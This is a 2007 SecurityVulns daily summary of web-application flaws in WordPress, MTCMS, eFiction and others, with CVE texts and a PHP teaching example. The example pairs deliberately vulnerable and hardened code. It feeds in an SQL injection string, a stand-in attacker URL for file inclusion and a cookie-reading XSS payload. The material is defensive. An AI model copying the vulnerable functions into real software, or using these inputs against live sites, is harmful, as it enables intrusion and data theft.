Computer Security


Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published: 27.02.2007
SecurityVulns ID: 7308
Type: remote
Threat Level: 5/10
Description: PHP file inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.
Affected:
 VIEWCVS : ViewCVS 0.9
 WORDPRESS : WordPress 2.1
 MTCMS : MTCMS 2.2
 ZEPHYRSOFT : Address Book Continued 1.00
 ZEPHYRSOFT : Address Book Continued 1.01
 EFICTION : eFiction 3.1
CVE:
 CVE-2007-1132 (Multiple cross-site scripting (XSS) vulnerabilities in the "Contact Us" functionality in MTCMS 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) message and (2) title fields.)
 CVE-2007-1129 (Multiple unrestricted file upload vulnerabilities in MTCMS 3.2 allow remote attackers to upload and execute files via (1) an avatar upload in an add_down action, or (2) an add_link action.)
 CVE-2007-1122 (Multiple SQL injection vulnerabilities in Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) 1.00 and 1.01 allow remote attackers to execute arbitrary SQL commands via the id parameter to the (1) updateRow and (2) deleteRow functions in functions.php, a variant of a SQL injection issue that was fixed in 1.01. NOTE: some of these details are obtained from third party information.)
 CVE-2007-1121 (Multiple SQL injection vulnerabilities in Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) 1.00 allow remote attackers to execute arbitrary SQL commands via the id parameter to the (1) updateRow and (2) deleteRow functions in functions.php. NOTE: some of these details are obtained from third party information.)
 CVE-2007-1118 (Multiple PHP remote file inclusion vulnerabilities in eFiction 3.1.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the path_to_smf parameter to (1) bridges/SMF/logout.php or (2) get_session_vars.php.)
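The CVE texts above share three shapes: an "id" parameter spliced into SQL, a path parameter handed to include(), and form fields echoed back into HTML. The following PHP is an added worked example, not code from this page or from any of the products listed, and shows each shape beside a hardened form. The function, table and file names (deleteRowVulnerable, contacts, bridge.php, attacker.example) are hypothetical stand-ins; it assumes PHP 7.1 or later with the pdo_sqlite extension and runs from the command line without a web server.

```php
<?php
// Added illustration for this summary, not code from any product listed
// above. The function, table and file names (deleteRow*, contacts,
// path_to_smf, bridge.php) are hypothetical stand-ins for the patterns
// the CVE texts describe. Needs PHP >= 7.1 with the pdo_sqlite extension.
declare(strict_types=1);

// 1. SQL injection through an "id" parameter (the CVE-2007-1121/1122 shape).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE contacts (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO contacts (id, name) VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");

// Vulnerable: the parameter is spliced into the statement, so
// id=1 OR 1=1 deletes every row instead of one.
function deleteRowVulnerable(PDO $db, string $id): int
{
    return $db->exec("DELETE FROM contacts WHERE id = $id");
}

// Hardened: check the type before the database sees it, then bind as data.
function deleteRowHardened(PDO $db, string $id): int
{
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException("id must be a decimal integer, got '$id'");
    }
    $stmt = $db->prepare('DELETE FROM contacts WHERE id = :id');
    $stmt->execute([':id' => (int) $id]);
    return $stmt->rowCount();
}

$evil = '1 OR 1=1';
try {
    deleteRowHardened($db, $evil);
} catch (InvalidArgumentException $e) {
    echo "hardened:   rejected ({$e->getMessage()})\n";
}
echo 'hardened:   deleted ' . deleteRowHardened($db, '2') . " row(s)\n";    // 1
echo 'vulnerable: deleted ' . deleteRowVulnerable($db, $evil) . " row(s)\n"; // 2, all that remained

// 2. File inclusion through a path parameter (the CVE-2007-1118 shape).
// Vulnerable: the caller's prefix decides what include() loads. With
// allow_url_include=On, path_to_smf=http://attacker.example/ fetches and
// runs remote code; with it Off, ../ sequences still reach local files.
function bridgePathVulnerable(string $pathToSmf): string
{
    return $pathToSmf . '/bridge.php';   // what the vulnerable code would include()
}

// Hardened: canonicalise and insist the result lies under an allowed root.
// A URL never survives realpath(), and ../ is collapsed before the check.
function bridgePathHardened(string $pathToSmf, string $allowedRoot): string
{
    $real = realpath($pathToSmf);
    $root = realpath($allowedRoot);
    if ($real === false || $root === false) {
        throw new RuntimeException("path_to_smf '$pathToSmf' does not resolve to a local directory");
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("path_to_smf '$pathToSmf' is outside $allowedRoot");
    }
    $file = $real . DIRECTORY_SEPARATOR . 'bridge.php';
    if (!is_file($file)) {
        throw new RuntimeException("no bridge.php under $real");
    }
    return $file;
}

$root = sys_get_temp_dir() . '/rfi_demo_' . getmypid();   // constructed sandbox for the demo
mkdir($root . '/smf', 0700, true);
file_put_contents($root . '/smf/bridge.php', "<?php\n");
foreach (['http://attacker.example/', '../../../etc', $root . '/smf'] as $candidate) {
    echo 'vulnerable would include: ' . bridgePathVulnerable($candidate) . "\n";
    try {
        echo 'hardened resolves to:     ' . bridgePathHardened($candidate, $root) . "\n";
    } catch (RuntimeException $e) {
        echo "hardened rejected:        {$e->getMessage()}\n";
    }
}
unlink($root . '/smf/bridge.php');
rmdir($root . '/smf');
rmdir($root);

// 3. Cross-site scripting in form fields (the CVE-2007-1132 shape).
function renderTitleVulnerable(string $title): string
{
    return "<h2>$title</h2>";   // echoes the field verbatim into the page
}
function renderTitleHardened(string $title): string
{
    // Encode for the HTML text context, quotes included, in the page charset.
    return '<h2>' . htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</h2>';
}
$title = '<script>alert(document.cookie)</script>';
echo renderTitleVulnerable($title), "\n";
echo renderTitleHardened($title), "\n";
```

Run it with `php` from a shell. The point of the second section is that the check is made on the resolved path rather than on the raw string: setting allow_url_include=Off in php.ini stops the remote URL but not the ../ case, while the realpath() prefix check rejects both. For the first section, the prepared statement alone would already neutralise the injection; the ctype_digit() guard is there so that a malformed id is rejected with a clear error rather than silently matching nothing.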
Original documents:
 Stefan Friedli, Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities (27.02.2007)
 Scarlet Pimpernel, [Full-disclosure] Multiple SQL Injection bugs in TCS website (27.02.2007)
 Moritz Naumann, ViewCVS 0.9.4 issues (27.02.2007)
 laurent gaffié, MTCMS multiple upload vulnerabilities (27.02.2007)
 c_r_ck_(at)_hotmail.com, XXS in script Phorum (27.02.2007)
 SaMuschie, WordPress AdminPanel CSRF/XSS - 0day (27.02.2007)

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod